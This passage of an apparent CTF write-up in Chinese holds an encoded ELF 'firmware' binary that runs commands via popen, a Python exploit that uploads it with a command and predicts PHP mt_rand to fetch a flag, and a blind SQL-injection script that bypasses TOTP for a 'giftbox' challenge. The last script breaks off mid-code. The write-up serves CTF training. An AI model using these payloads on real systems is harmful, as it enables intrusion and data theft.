WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWEAAAAAARsDOyAAAAADAAAAFO///zwAAABk7///ZAAAACnw//98AAAAFAAAAAAAAAABelIAAXgQARsMBwiQAQAAJAAAABwAAADQ7v//UAAAAAAOEEYOGEoPC3cIgAA/GjsqMyQiAAAAABQAAABEAAAA+O7//wgAAAAAAAAAAAAAABwAAABcAAAApe///3YAAAAAQQ4QhgJDDQYCcQwHCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADARAAAAAAAAAAAAAAAAAADwEAAAAAAAAAEAAAAAAAAAfAAAAAAAAAAMAAAAAAAAAAAQAAAAAAAADQAAAAAAAACsEQAAAAAAABkAAAAAAAAAAD4AAAAAAAAbAAAAAAAAABAAAAAAAAAAGgAAAAAAAAAQPgAAAAAAABwAAAAAAAAACAAAAAAAAAD1/v9vAAAAAGACAAAAAAAAB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2lzdGVyX3RtX2Nsb25lcwBfX2RvX2dsb2JhbF9kdG9yc19hdXgAY29tcGxldGVkLjczMjUAX19kb19nbG9iYWxfZHRvcnNfYXV4X2ZpbmlfYXJyYXlfZW50cnkAZnJhbWVfZHVtbXkAX19mcmFtZV9kdW1teV9pbml0X2FycmF5X2VudHJ5AGZpcm13YXJlLmMAX19GUkFNRV9FTkRfXwBfZmluaQBfX2Rzb19oYW5kbGUAX0RZTkFNSUMAX19HTlVfRUhfRlJBTUVfSERSAF9fVE1DX0VORF9fAF9HTE9CQUxfT0ZGU0VUX1RBQkxFXwBfaW5pdABfSVRNX2RlcmVnaXN0ZXJUTUNsb25lVGFibGUAZnJlYWRAQEdMSUJDXzIuMi41AGZ1bgBwY2xvc2VAQEdMSUJDXzIuMi41AG1lbXNldEBAR0xJQkNfMi4yLjUAX19nbW9uX3N0YXJ0X18AcG9wZW5AQEdMSUJDXzIuMi41AF92ZXJzaW9uAF9JVE1fcmVnaXN0ZXJUTUNsb25lVGFibGUAX19jeGFfZmluYWxpemVAQEdMSUJDXzIuMi41AAAuc3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5ub3RlLmdudS5idWlsZC1pZAAuZ251Lmhhc2gALmR5bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsYS5keW4ALnJlbGEucGx0AC5pbml0AC5wbHQuZ290AC50ZXh0AC5maW5pAC5yb2RhdGEALmVoX2ZyYW1lX2hkcgAuZWhfZnJhbWUALmluaXRfYXJyYXkALmZpbmlfYXJyYXkALmR5bmFtaWMALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVudAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAcAAAACAAAAAAAAADgCAAAAAAAAOAIAAAAAAAAkAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAC4AAAD2//9vAgAAAAAAAABgAgAAAAAAAGACAAAAAAAAMAAAAAAAAAADAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAA4AAAACwAAAAIAAAAAAAAAkAIAAAAAAACQAgAAAAAAACABAAAAAAAABAAAAAEAAAAIAAAAAAAAABgAAAAAAAAAQAAAAAMAAAACAAAAAAAAALADAAAAAAAAsAMAAAAAAACSAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAEgAAAD///9vAgAAAAAAAABCBAAAAAAAAEIEAAAAAAAAGAAAAAAAAAADAAAAAAAAAAIAAAAAAAAAAgAAAAAAAABVAAAA/v//bwIAAAAAAAAAYAQAAAAAAABgBAAAAAAAACAAAAAAAAAABAAAAAEAAAAIAAAAAAAAAAAAAAAAAAAAZAAAAAQAAAACAAAAAAAAAIAEAAAAAAAAgAQAAAAAAADwAAAAAAAAAAMAAAAAAAAACAAAAAAAAAAYAAAAAAAAAG4AAAAEAAAAQgAAAAAAAABwBQAAAAAAAHAFAAAAAAAAYAAAAAAAAAADAAAAFQAAAAgAAAAAAAAAGAAAAAAAAAB4AAAAAQAAAAYAAAAAAAAAABAAAAAAAAAAEAAAAAAAABcAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAcwAAAAEAAAAGAAAAAAAAACAQAAAAAAAAIBAAAAAAAABQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAAH4AAAABAAAABgAAAAAAAABwEAAAAAAAAHAQAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAACHAAAAAQAAAAYAAAAAAAAAgBAAAAAAAACAEAAAAAAAACsBAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAjQAAAAEAAAAGAAAAAAAAAKwRAAAAAAAArBEAAAAAAAAJAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAJMAAAABAAAAAgAAAAAAAAAAIAAAAAAAAAAgAAAAAAAACQEAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAACbAAAAAQAAAAIAAAAAAAAADCEAAAAAAAAMIQAAAAAAACQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAqQAAAAEAAAACAAAAAAAAADAhAAAAAAAAMCEAAAAAAAB8AAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAALMAAAAOAAAAAwAAAAAAAAAAPgAAAAAAAAAuAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAAC/AAAADwAAAAMAAAAAAAAAED4AAAAAAAAQLgAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAywAAAAYAAAADAAAAAAAAABg+AAAAAAAAGC4AAAAAAADAAQAAAAAAAAQAAAAAAAAACAAAAAAAAAAQAAAAAAAAAIIAAAABAAAAAwAAAAAAAADYPwAAAAAAANgvAAAAAAAAKAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADUAAAAAQAAAAMAAAAAAAAAAEAAAAAAAAAAMAAAAAAAADgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA3QAAAAEAAAADAAAAAAAAADhAAAAAAAAAODAAAAAAAAAQAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAOMAAAAIAAAAAwAAAAAAAABgQAAAAAAAAEgwAAAAAAAAUAEAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAADoAAAAAQAAADAAAAAAAAAAAAAAAAAAAABIMAAAAAAAABwAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAaDAAAAAAAAAoBQAAAAAAABoAAAAsAAAACAAAAAAAAAAYAAAAAAAAAAkAAAADAAAAAAAAAAAAAAAAAAAAAAAAAJA1AAAAAAAAxAEAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAARAAAAAwAAAAAAAAAAAAAAAAAAAAAAAABUNwAAAAAAAPEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAA')


class php_rand():

    MT_RAND_MT19937 = 0
    MT_RAND_PHP = 1
    php_N = 624
    php_M = 397
    php_left = 0
    php_next = 0
    php_state = [0] * (php_N + 1)
    php_mode = 0

    def __init__(self, seed, mode=0):
        self.php_mt_srand(seed)
        self.php_mode = mode


    def seed(self, seed):
        self.php_mt_srand(seed)


    def rand(self):
        return self.php_mt_rand()


    def hiBit(self, u):
        return u & 0x80000000


    def loBit(self, u):
        return u & 0x00000001


    def loBits(self, u):
        return u & 0x7FFFFFFF


    def mixBits(self, u, v):
        return self.hiBit(u) | self.loBits(v)


    def twist(self, m, u, v):
        return m ^ (self.mixBits(u, v) >> 1) ^ ((-self.loBit(v)) & 0x9908b0df)


    def twist_php(self, m, u, v):
        return m ^ (self.mixBits(u, v) >> 1) ^ ((-self.loBit(u)) & 0x9908b0df)


    def php_mt_initialize(self, seed):
        state = self.php_state
        N = self.php_N
        state[0] = seed & 0xffffffff
        for i in range(1, N):
            state[i] = (1812433253 * (state[i - 1] ^ (state[i - 1] >> 30)) + i) & 0xffffffff
        self.php_state = state


    def php_mt_reload(self):
        self.php_left = 0
        state = self.php_state
        N = self.php_N
        M = self.php_M
        p = 0
        i = N - M
        if self.php_mode == self.MT_RAND_MT19937:
            while i > 0:
                i -= 1
                state[p] = self.twist(state[p + M],state[p + 0],state[p + 1])
                p += 1
            i = M - 1
            while i > 0:
                state[p] = self.twist(state[p+M-N],state[p + 0],state[p + 1])
                p += 1
                i -= 1
            state[p] = self.twist(state[p + M - N],state[p + 0],state[0])
        else:
            while i > 0:
                i -= 1
                state[p] = self.twist_php(state[p + M],state[p + 0],state[p + 1])
                p += 1
            i = M - 1
            while i > 0:
                state[p] = self.twist_php(state[p + M - N],state[p + 0],state[p + 1])
                p += 1
                i -= 1
            state[p] = self.twist_php(state[p + M - N],state[p + 0],state[0])
        self.php_left = N
        self.php_next = 0
        self.php_state = state


    def php_mt_srand(self, seed):
        self.php_mt_initialize(seed)
        self.php_mt_reload()


    def php_mt_rand(self):
        if self.php_left == 0: self.php_mt_reload()
        self.php_left -= 1
        s1 = self.php_state[self.php_next]
        s1 ^= (s1 >> 11)
        s1 ^= (s1 << 7) & 0x9d2c5680
        s1 ^= (s1 << 15) & 0xefc60000
        self.php_next += 1
        return ( s1 ^ (s1 >> 18)) >> 1


# get random string
def rand_str(length=8):
    return ''.join(random.sample(string.ascii_letters + string.digits, length))


# get method
def get(session, url):
    retry = 0
    while True:
        retry += 1
        try:
            if session:
                r = s.get(url, timeout=timeout)
            else:
                r = requests.get(url, timeout=timeout)
        except:
            if retry >= retry_count:
                print('timeout or http 500')
                exit()
            continue
        break
    return r


# post method
def post(session, url, data, files=''):
    retry = 0
    while True:
        retry += 1
        try:
            if session:
                if files=='':
                    r = s.post(url, data=data, timeout=timeout)
                else:
                    r = s.post(url, data=data, files=files, timeout=timeout)
            else:
                if files=='':
                    r = requests.post(url, data=data, timeout=timeout)
                else:
                    r = requests.post(url, data=data, files=files, timeout=timeout)
        except:
            if retry >= retry_count:
                print('timeout or http 500')
                exit()
            continue
        break
    return r


# login with username and password
def login(username, password):
    url = site_url + '/hotload.php?page=login'
    data = {'username': username, 'password': password}
    if logging: print(url)
    if logging: print(data)
    res = post(1, url, data)
    if logging: print(res.text)
    url = site_url + '/hotload.php?page=upload'
    res = get(1, url)
    if 'fileuploaded' not in res.text:
        return False
    return True


# reg with username and password
def reg(username, password):
    url = site_url + '/hotload.php?page=reg'
    if logging: print(url)
    res = get(1, url)
    show_code = ''
    show_calc = ''
    try:
        show_code = res.text.split('show_code">')[1].split('<')[0]
        show_calc = res.text.split('show_calc">')[1].split('<')[0]
        if logging: print(len(show_calc))
        if len(show_calc) != 6:
            print('invalid show_calc length')
            return False
    except:
        return False
    if logging: print("show_code",show_code)
    if logging: print("show_calc",show_calc)
    code = ''
    for i in range(1, 100000000):
        code = str(i)
        if hashlib.md5(code + show_code).hexdigest()[:6] == show_calc.lower(): break
    data = {'username': username, 'password1': password, 'password2': password, 'code': code}
    if logging: print(data)
    res = post(1, url, data)
    if logging: print(res.text)
    if '"status":1' in res.text:
        return True
    return False


# upload music [diff]
def upload_music():
    url = site_url + '/hotload.php?page=upload'
    data = {'file_id': '0'}
    music = preset_music[:0x6] + '\x00\x00\x03\x00' + preset_music[0x0a:0x53]
    music += '\x00\x00\x03\x00' + '\x00\x00\x03' + 'a' * 0x70 + '\x00'
    files = {'file_data': music}
    if logging: print(url)
    if logging: print(data)
    res = post(1, url, data, files)
    if logging: print(res.text)
    if '"status":1' in res.text:
        try:
            # n54LuyJyYLVpVO2w
            return b64decode(json.loads(res.content.strip())['artist'])[:16]
        except:
            return ''
    return ''


# upload firmware [diff]
def upload_firmware(command):
    if len(command) > 0x100: return -1
    url = site_url + '/hotload.php?page=firmware'
    data = {'file_id': '0'}
    command = command.ljust(0x100, '\x00')
    firmware = preset_firmare.replace('a' * 0x100, command)
    files = {'file_data': firmware}
    if logging: print(url)
    if logging: print(data)
    res = post(1, url, data, files)
    if logging: print("Upload: " + res.text)
    if '"status":1' in res.text:
        if 'Date' in res.headers.keys():
            print("Date Header: " + res.headers['Date'])
            return int(datetime.strptime(res.headers['Date'], "%a, %d %b %Y %X %Z").strftime("%s")) + time_zone_offset
        else:
            return int(time.time())
    return -1


# get firmware version
def firmware_version(path):
    if len(path)>0x40: return ''
    url = site_url + '/hotload.php?page=firmware'
    data = {'path': path}
    if logging: print(url)
    if logging: print(data)
    res = post(1, url, data)
    if logging: print(res.text)
    if '"status":1' in res.text:
        try:
            return json.loads(res.content.strip())['info']
        except:
            return ''
    return ''


# show result
def show_result(vuln1, vuln2, msg):
    result = ''
    if vuln1 == -1:
        result += 'Vuln 1 check: unknown.\n'
    elif vuln1 == 0:
        result += 'Vuln 1 check: fail.\n'
    else:
        result += 'Vuln 1 check: pass.\n'
    if vuln2 == -1:
        result += 'Vuln 2 check: unknown.\n'
    elif vuln2 == 0:
        result += 'Vuln 2 check: fail.\n'
    else:
        result += 'Vuln 2 check: pass.\n'
    result += msg
    print(result)
    exit()


# get flag
def get_flag():
    path = 0
    vuln1 = -1
    vuln2 = -1
    logined = -1
    if path == 0:
        # username = '1Bq2DT3j'
        # password = 'KWRpkXgHnb'
        # # res = reg(username, password)
        # # if not res: show_result(vuln1, vuln2, 'register fail')
        # res = login(username, password)
        # if not res: show_result(vuln1, vuln2, 'login fail')
        # time.sleep(3)
        # res = upload_music()
        # if res == '':
        #     vuln1 = 0
        #     show_result(vuln1, vuln2, 'leak admin password fail')
        admin_password = 'Mike84eiNxHcMVCz'
        global s
        s = requests.session()
        res = login('admin', admin_password)
        if not res:
            vuln1 = 0
            show_result(vuln1, vuln2, 'leak wrong admin password')
        vuln1 = 1
    time.sleep(3)
    guess_server_time = upload_firmware(command)
    print(guess_server_time)
    if guess_server_time == -1:
        show_result(vuln1, vuln2, 'upload fail')
    vuln2 = 0
    succ_keyword = '固件版本号：'
    if vuln2 == 0:
        for i in range(5):
            rander = php_rand(guess_server_time - i)
            # path = hashlib.md5(str(rander.rand()) + '182.91.145.76').hexdigest()
            path = hashlib.md5(str(rander.rand()) + '39.108.249.224').hexdigest()
            try:
                prev_flag = firmware_version(path).encode('utf-8')
            except:
                continue
            if succ_keyword in prev_flag:
                vuln2 = 1
                prev_flag = prev_flag.replace(succ_keyword, '').strip()
                break
    show_result(vuln1, vuln2, prev_flag)


if __name__ == '__main__':
    if len(argv) != 3:
        print("wrong params.")
        print("example: python %s %s %s" % (argv[0], '127.0.0.1', '80'))
        exit()
    ip = argv[1]
    port = int(argv[2])
    site_url = 'http://%s:%d' % (ip, port)
    get_flag()

PS: 注意时区问题

0x04 giftbox

题目描述

送给小蛮腰的礼物，她是一位美丽的姑娘。

A gift for Canton Tower, a pretty girl.

题目解答

PS: 这个樱花真好看，上去就先保存了，哈哈

1. 看

   view-source:http://222.85.25.41:8090/js/

知道pyotp.zip和>totp.min.js是采用了双因子认证

2. 得到关于双因子认证的信息

   view-source:http://222.85.25.41:8090/js/main.js

3. login处登录注入得到账号密码

   #!/usr/bin/env python3
   # -*- coding: utf-8 -*-
   
   import requests
   
   import pyotp as pyotp
   
   totp = pyotp.TOTP('GAXG24JTMZXGKZBU', 8, interval=5)
   
   
   def main():
       get_data()
   
   
   def http_get(payload):
   
       r = requests.post('http://222.85.25.41:8090/shell.php', params={'a': 'login admin\'/**/and/**/(' + payload + ')/**/and/**/\'1\'=\'1 admin', 'totp': totp.now()},
                         data={'dir': '/', 'pos': '/', 'filename': 'usage.md'})
   
       # print('login admin\'/**/and/**/(' + payload + ')/**/and/**/\'1\'=\'1 admin')
       # print(r.text)
       if 'password' in r.text:
           return True
       else:
           return False
   
   def get_data():
       # db_nums_payload = "select/**/count(*)/**/from/**/user"
       # db_numbers = half(db_nums_payload)
       # print("长度为：%d" % db_numbers)
   
       # db_data = "select/**/version()"
       # db_data = "select/**/database()"
       for i in range(0, 2):
           # db_data = "SELECT/**/table_name/**/FROM/**/information_schema.tables/**/WHERE/**/table_schema=\'giftbox\'/**/LIMIT/**/{},1".format(
           #     i)
           # db_data = "SELECT/**/column_name/**/FROM/**/information_schema.columns/**/WHERE/**/table_schema=\'giftbox\'/**/and/**/table_name=\'users\'/**/LIMIT/**/{},1".format(
           #     i)
           db_data = "select/**/password/**/from/**/giftbox.users/**/limit/**/{},1".format(
               i)
           db_name = ""
